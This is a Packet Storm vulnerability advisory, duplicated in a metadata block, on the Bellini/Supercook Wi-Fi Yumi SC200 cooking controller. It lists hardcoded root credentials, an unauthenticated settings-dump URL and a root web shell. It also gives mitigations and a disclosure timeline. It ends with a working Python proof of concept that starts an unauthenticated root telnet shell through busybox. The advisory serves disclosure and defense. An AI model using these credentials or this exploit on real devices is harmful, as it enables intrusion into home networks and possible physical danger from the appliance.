Bellini/Supercook Wi-Fi Yumi SC200 Information Disclosure / Code Execution
2016-07-25T00:00:00
ID PACKETSTORM:138032 Type packetstorm Reporter James McLean Modified 2016-07-25T00:00:00
Description
`Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities
Reported By:
==================================
James McLean -
Primary: james dot mclean at gmail dot com
Secondary: labs at juicedigital dot net
Device Overview:
==================================
>From http://www.supercook.me/en/supercook/articles/btmkm800x/
"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional
kitchen machine. It has 13 functions so not only saves a huge amount of
time, it also incorporates the Yumi control module and its own recipe
collection, making it incredibly easy to use."
Vulnerability Overview:
==================================
Vuln1) Weak Username/Password for 'root' account.
Vuln2) Information disclosure, unauthenticated.
Vuln3) Remote arbitrary code execution.
CVE ID's
==================================
None assigned as yet.
Disclosure Timeline
==================================
2016-06-01: Vulnerability assessment commenced.
2016-07-04: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook Australia via Facebook. Supercook
responded, saying they will view the support request.
No further response recieved.
2016-07-19: Contacted Supercook Australia via Facebook. No response.
2016-07-21: Posted security assessment to vortex.id.au.
2016-07-22: Mitre contacted, CVE ID's requested.
It is with regret, but ultimately due to my concern for the community
that own these devices, that due to lack of communication I am disclosing
these vulnerabilities without the involvment of the vendor. I sincerely hope
that the vendor can resolve these issues in a timely manner.
I intend no malice by releasing these vulnerabilities, and only wish to
inform the community so appropriate steps may be taken by the owners of
these devices.
Due to the nature of the firmware on the device, these issues are not likely
caused by the vendor themselves.
Please do not use the information presented here for evil.
Affected Platforms:
==================================
Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.
Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as
same firmware is used.
As the Wi-fi Yumi firmware appears to be based on a stock firmware image
used on a number of other commodity 'IoT' devices, the vulnerabilities
described here are very likely to affect other devices with similar or
the same firmware.
--
Vuln1 Details:
==================================
Weak Username/Password for Root-level account.
Username: super
Password: super
These credentials provide access to the built in FTP server and web
administration interface. We did not attempt any more than a cursory
connection to the FTP server with these details.
According to the details disclosed in Vuln2, an additional account is present
on the device with the following credentials:
Username: admin
Password: AlpheusDigital1010
With the exception of a cursory check of the built in FTP service (which
failed for these credentials), we did not attempt to access the device with
these credentials.
Vuln1 Notes:
==================================
We did not attempt to change or ascertain if it was possible to change these
access credentials; as Vuln2 completely negates any change made.
Vuln1 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
--
Vuln2 Details:
==================================
Information disclosure, unauthenticated.
Device URL: http://10.10.1.1/Setting.chipsipcmd
The device offers, via its built in webserver, a full list of all configuration
parameters available. This list includes the above mentioned root account
username and password, and the password to the parent connected wifi network.
All details are in plain text, and transmitted in the format of a key-value
pair making retrieval, recovery and use of all configuration
information trivial.
This interface is also available from the parent wi-fi network via DHCP assigned
IPv4 address.
Vuln2 Notes:
==================================
Example data returned:
DEF_IP_ADDR=10.10.1.1
DEF_SUBNET_MASK=255.255.255.0
...
DEF_SUPER_NAME="super"
DEF_SUPER_PASSWORD="super"
DEF_USER_NAME="admin"
DEF_USER_PASSWORD="AlpheusDigital1010"
...
Vuln2 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using
the mobile application to upload recipes, then disconnect from the device and
connect your mobile device to a trusted network once again to access the
internet once again.
Revert to the non-wifi Yumi controller.
The vendor should establish a method of authentication to the device from the
various mobile applications available, and transport any configuration in an
encrypted format using keys which are not generally available or easily
discoverable.
--
Vuln3 Details:
==================================
Remote arbitrary code execution.
Device URL: http://10.10.1.1/syscmd.asp
The device offers a built-in web-shell which, once authenticated using the
details discovered in Vuln2, allows the execution of any command the device
can execute - as the built in webserver runs as the root user.
It is possible to execute a command using this interface that would create
any file in any location. This would allow an attacker to establish persistence.
Additionally, the built in busybox binary includes the option
'telnetd', meaning it is
possible to execute the relevant command to start a telnet daemon remotely.
The running daemon then requires no authentication to connect, and runs as
the root account.
Vuln3 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please
mind your warranty if you modify the files on the device).
The vendor should disable any and all commands on the device and scripts in
the web interface which are not specifically required for the normal
functionality of the device or its communication with control apps.
In this instance, the vendor should REMOVE the page '/syscmd.asp' and also
/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent
arbitrary commands from being executed.
Additionally, busybox should be recompiled such that the 'telnetd' option is
no longer available to be executed.
--
Vuln1/Vuln2/Vuln3 Risks:
==================================
Weak and easily discoverable root credentials combined with easily accessed
remote shell functionality is a dangerous combination. These vulnerabilities
could allow any sufficiently advanced malware to become persistent in a LAN
and re-infect hosts at will (advanced crypto-locker style malware comes to
mind), capture and exfiltrate data on either Wireless network the device is
connected to, MITM any traffic routed through the device, or other as yet
unknown attack vectors.
Additionally, as full root access is easily obtainable, it may be possible
for an attacker to cause the cooking functionality to behave erratically or
possibly even dangerously due to the built in spinning blades and heating
elements. While we ultimately did not attempt to control these aspects of the
device due to the fact that it makes our dinner most nights, these risks are
worth raising.
This vulnerability assessment should not be considered an exhaustive list
of all vunlnerabilities the device may have. Due to time constraints we were
unable to invest the required time to discover and document all issues. Due to
the nature of the firmware on the device, most of these have likely been
discovered in other products at various times, this item may even duplicate
another from a similar device.
Notes:
==================================
No security assessment of code used for control of cooker functionality was
undertaken; as this does not, in my opinion, rate as seriously as the other
vulnerabilities discovered and disclosed here. However, it should be noted,
that with the root access that is VERY easily obtained, it may be possible for
an attacker to cause the cooking functionality of the machine to behave
erratically or even dangerously due to the built in spinning blades and heating
elements. Further to this, a malicious partner or offspring may intentionally
sabotage dinner, if he/she would prefer to eat takeout.
No attempt was made to connect to or manipulate files on the built in Samba
shares, however given the weak credentials sufficiently advanced malware may be
able to use these shares to establish persistence.
The 'Bellini' name may be regional, our device was procured in Australia and
as such may or may not have a different name in other countries.
A full, detailed, rundown and commentary is available at
https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/
Vuln3 Proof of Concept:
==================================
#!/usr/bin/env python
import urllib
import urllib2
from subprocess import call
# Connect to the device's wifi network, then run.
# Root access will be provided.
url = 'http://10.10.1.1/goform/formSysCmd'
cmd = 'busybox telnetd -l /bin/sh'
username = 'super'
password = 'super'
# setup the password handler
basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()
basicauth.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(basicauth)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
# Connect to the device, send the data
values = {
'sysCmd': cmd,
'apply': 'Apply',
'submit-url': '/syscmd.asp'
}
data = urllib.urlencode(values)
pagehandle = urllib2.urlopen(url, data)
# Connect to Telnet.
call(["telnet","10.10.1.1"])
# Pwnd.
# End of document.
`
{"hash": "5ab8a48639eba0c1a629ebb8862b99b73aca67d22af6cb2be44ba5e980ae6ae2", "sourceHref": "https://packetstormsecurity.com/files/download/138032/bellinisupercook-execdisclose.txt", "title": "Bellini/Supercook Wi-Fi Yumi SC200 Information Disclosure / Code Execution", "id": "PACKETSTORM:138032", "published": "2016-07-25T00:00:00", "description": "", "modified": "2016-07-25T00:00:00", "sourceData": "`Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities \n \nReported By: \n================================== \nJames McLean - \nPrimary: james dot mclean at gmail dot com \nSecondary: labs at juicedigital dot net \n \nDevice Overview: \n================================== \n>From http://www.supercook.me/en/supercook/articles/btmkm800x/ \n \n\"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional \nkitchen machine. It has 13 functions so not only saves a huge amount of \ntime, it also incorporates the Yumi control module and its own recipe \ncollection, making it incredibly easy to use.\" \n \nVulnerability Overview: \n================================== \nVuln1) Weak Username/Password for 'root' account. \nVuln2) Information disclosure, unauthenticated. \nVuln3) Remote arbitrary code execution. \n \nCVE ID's \n================================== \nNone assigned as yet. \n \nDisclosure Timeline \n================================== \n2016-06-01: Vulnerability assessment commenced. \n2016-07-04: Contacted Supercook.me support via Web Contact. No response. \n2016-07-12: Contacted Supercook.me support via Web Contact. No response. \n2016-07-12: Contacted Supercook Australia via Facebook. Supercook \nresponded, saying they will view the support request. \nNo further response recieved. \n2016-07-19: Contacted Supercook Australia via Facebook. No response. \n2016-07-21: Posted security assessment to vortex.id.au. \n2016-07-22: Mitre contacted, CVE ID's requested. \n \nIt is with regret, but ultimately due to my concern for the community \nthat own these devices, that due to lack of communication I am disclosing \nthese vulnerabilities without the involvment of the vendor. I sincerely hope \nthat the vendor can resolve these issues in a timely manner. \n \nI intend no malice by releasing these vulnerabilities, and only wish to \ninform the community so appropriate steps may be taken by the owners of \nthese devices. \n \nDue to the nature of the firmware on the device, these issues are not likely \ncaused by the vendor themselves. \n \nPlease do not use the information presented here for evil. \n \nAffected Platforms: \n================================== \nBellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3. \nBellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as \nsame firmware is used. \n \nAs the Wi-fi Yumi firmware appears to be based on a stock firmware image \nused on a number of other commodity 'IoT' devices, the vulnerabilities \ndescribed here are very likely to affect other devices with similar or \nthe same firmware. \n \n-- \n \nVuln1 Details: \n================================== \nWeak Username/Password for Root-level account. \nUsername: super \nPassword: super \n \nThese credentials provide access to the built in FTP server and web \nadministration interface. We did not attempt any more than a cursory \nconnection to the FTP server with these details. \n \nAccording to the details disclosed in Vuln2, an additional account is present \non the device with the following credentials: \nUsername: admin \nPassword: AlpheusDigital1010 \n \nWith the exception of a cursory check of the built in FTP service (which \nfailed for these credentials), we did not attempt to access the device with \nthese credentials. \n \nVuln1 Notes: \n================================== \nWe did not attempt to change or ascertain if it was possible to change these \naccess credentials; as Vuln2 completely negates any change made. \n \nVuln1 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network. \nRevert to the non-wifi Yumi controller. \n \n-- \n \nVuln2 Details: \n================================== \nInformation disclosure, unauthenticated. \n \nDevice URL: http://10.10.1.1/Setting.chipsipcmd \n \nThe device offers, via its built in webserver, a full list of all configuration \nparameters available. This list includes the above mentioned root account \nusername and password, and the password to the parent connected wifi network. \nAll details are in plain text, and transmitted in the format of a key-value \npair making retrieval, recovery and use of all configuration \ninformation trivial. \n \nThis interface is also available from the parent wi-fi network via DHCP assigned \nIPv4 address. \n \nVuln2 Notes: \n================================== \nExample data returned: \nDEF_IP_ADDR=10.10.1.1 \nDEF_SUBNET_MASK=255.255.255.0 \n... \nDEF_SUPER_NAME=\"super\" \nDEF_SUPER_PASSWORD=\"super\" \nDEF_USER_NAME=\"admin\" \nDEF_USER_PASSWORD=\"AlpheusDigital1010\" \n... \n \nVuln2 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network, only using \nthe mobile application to upload recipes, then disconnect from the device and \nconnect your mobile device to a trusted network once again to access the \ninternet once again. \n \nRevert to the non-wifi Yumi controller. \n \nThe vendor should establish a method of authentication to the device from the \nvarious mobile applications available, and transport any configuration in an \nencrypted format using keys which are not generally available or easily \ndiscoverable. \n \n-- \n \nVuln3 Details: \n================================== \nRemote arbitrary code execution. \n \nDevice URL: http://10.10.1.1/syscmd.asp \n \nThe device offers a built-in web-shell which, once authenticated using the \ndetails discovered in Vuln2, allows the execution of any command the device \ncan execute - as the built in webserver runs as the root user. \n \nIt is possible to execute a command using this interface that would create \nany file in any location. This would allow an attacker to establish persistence. \n \nAdditionally, the built in busybox binary includes the option \n'telnetd', meaning it is \npossible to execute the relevant command to start a telnet daemon remotely. \nThe running daemon then requires no authentication to connect, and runs as \nthe root account. \n \nVuln3 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network. \n \nRevert to the non-wifi Yumi controller. \n \nRemove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please \nmind your warranty if you modify the files on the device). \n \nThe vendor should disable any and all commands on the device and scripts in \nthe web interface which are not specifically required for the normal \nfunctionality of the device or its communication with control apps. \n \nIn this instance, the vendor should REMOVE the page '/syscmd.asp' and also \n/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent \narbitrary commands from being executed. \n \nAdditionally, busybox should be recompiled such that the 'telnetd' option is \nno longer available to be executed. \n \n-- \n \nVuln1/Vuln2/Vuln3 Risks: \n================================== \nWeak and easily discoverable root credentials combined with easily accessed \nremote shell functionality is a dangerous combination. These vulnerabilities \ncould allow any sufficiently advanced malware to become persistent in a LAN \nand re-infect hosts at will (advanced crypto-locker style malware comes to \nmind), capture and exfiltrate data on either Wireless network the device is \nconnected to, MITM any traffic routed through the device, or other as yet \nunknown attack vectors. \n \nAdditionally, as full root access is easily obtainable, it may be possible \nfor an attacker to cause the cooking functionality to behave erratically or \npossibly even dangerously due to the built in spinning blades and heating \nelements. While we ultimately did not attempt to control these aspects of the \ndevice due to the fact that it makes our dinner most nights, these risks are \nworth raising. \n \nThis vulnerability assessment should not be considered an exhaustive list \nof all vunlnerabilities the device may have. Due to time constraints we were \nunable to invest the required time to discover and document all issues. Due to \nthe nature of the firmware on the device, most of these have likely been \ndiscovered in other products at various times, this item may even duplicate \nanother from a similar device. \n \nNotes: \n================================== \nNo security assessment of code used for control of cooker functionality was \nundertaken; as this does not, in my opinion, rate as seriously as the other \nvulnerabilities discovered and disclosed here. However, it should be noted, \nthat with the root access that is VERY easily obtained, it may be possible for \nan attacker to cause the cooking functionality of the machine to behave \nerratically or even dangerously due to the built in spinning blades and heating \nelements. Further to this, a malicious partner or offspring may intentionally \nsabotage dinner, if he/she would prefer to eat takeout. \n \nNo attempt was made to connect to or manipulate files on the built in Samba \nshares, however given the weak credentials sufficiently advanced malware may be \nable to use these shares to establish persistence. \n \nThe 'Bellini' name may be regional, our device was procured in Australia and \nas such may or may not have a different name in other countries. \n \nA full, detailed, rundown and commentary is available at \nhttps://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/ \n \nVuln3 Proof of Concept: \n================================== \n#!/usr/bin/env python \n \nimport urllib \nimport urllib2 \nfrom subprocess import call \n \n# Connect to the device's wifi network, then run. \n# Root access will be provided. \n \nurl = 'http://10.10.1.1/goform/formSysCmd' \ncmd = 'busybox telnetd -l /bin/sh' \nusername = 'super' \npassword = 'super' \n \n# setup the password handler \nbasicauth = urllib2.HTTPPasswordMgrWithDefaultRealm() \nbasicauth.add_password(None, url, username, password) \n \nauthhandler = urllib2.HTTPBasicAuthHandler(basicauth) \nopener = urllib2.build_opener(authhandler) \n \nurllib2.install_opener(opener) \n \n# Connect to the device, send the data \nvalues = { \n'sysCmd': cmd, \n'apply': 'Apply', \n'submit-url': '/syscmd.asp' \n} \ndata = urllib.urlencode(values) \npagehandle = urllib2.urlopen(url, data) \n \n# Connect to Telnet. \ncall([\"telnet\",\"10.10.1.1\"]) \n \n# Pwnd. \n \n# End of document. \n \n \n`\n", "reporter": "James McLean", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b495e04059b58bac09abde91001998e9"}, {"key": "modified", "hash": "952539204e3dcdf9fb320e71fa687278"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "952539204e3dcdf9fb320e71fa687278"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2cb21ad9843daef2dfe150c555beae8b"}, {"key": "sourceData", "hash": "cc40e41b307d1c252ec8a8ea5ccbab58"}, {"key": "sourceHref", "hash": "4612959d94c857ab4480dd525580890b"}, {"key": "title", "hash": "8b8cf4135aa518267df91691f6d35169"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/138032/Bellini-Supercook-Wi-Fi-Yumi-SC200-Information-Disclosure-Code-Execution.html", "lastseen": "2016-11-03T10:18:02", "viewCount": 0, "enchantments": {"vulnersScore": 10.0}}